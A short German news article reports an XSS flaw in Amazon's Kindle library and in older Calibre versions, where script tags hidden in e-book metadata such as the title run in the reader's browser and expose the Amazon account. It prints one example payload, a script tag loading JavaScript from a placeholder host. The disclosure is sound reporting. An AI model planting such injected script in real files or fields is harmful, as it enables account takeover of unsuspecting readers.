Sicherheitslücke beim E-Book-Reader Kindle

Amazons E-Book-Reader Kindle hat ein Sicherheitsleck. Angreifer erhalten über manipulierte E-Books vollen Zugriff auf das Amazon-Konto der Kindle-Leser. Der Trick: Die Hacker platzieren in den Metadaten des E-Books, also beispielsweise im Buchtitel, einen Skriptaufruf folgenden Formats:

<script src="https://www.example.org/script.js"></script>

Ruft der Kindle-Besitzer nun die Kindle-Bibliothek auf der Amazon-Website auf, dann wird das Skript ausgeführt und der Angreifer erhält Zugriff auf das Benutzerkonto des Kunden.

Benjamin Daniel Mussler beschreibt die Sicherheits-Lücke sehr detailliert in seinem Blog und stellt dort auch ein entsprechend präpariertes E-Book als Proof of Concept zum Download bereit. Seiner Aussage zu Folge sind alle Kindle-Besitzer von dieser Sicherheitslücke betroffen, die mit der Kindle-Bibliothek von Amazon arbeiten.

Die Gefahr besteht vor allem, wenn Kindle-Besitzer beispielsweise E-Books im MOBI-Format aus anderen Quellen auf ihren E-Book-Reader laden. Kunden, die ihre Bücher ausschliesslich über Amazon beziehen, sollten hingegen sicher sein vor derartigen Angriffen.

Bemerkenswert: Laut Mussler ist nicht nur Amazon für derartige Attacken per Cross-Site-Scripting (XSS) anfällig. Mit den manipulierten E-Books liessen sich in älteren Versionen der beliebten Software Calibre, mit der viele Leser ihre E-Books verwalten, ebenfalls Skripts ausführen. Erst ab Version 1.80 tritt das Problem in Calibre nicht mehr auf. Wer also noch eine ältere Version der Buchverwaltung nutzt, der sollte umgehend updaten.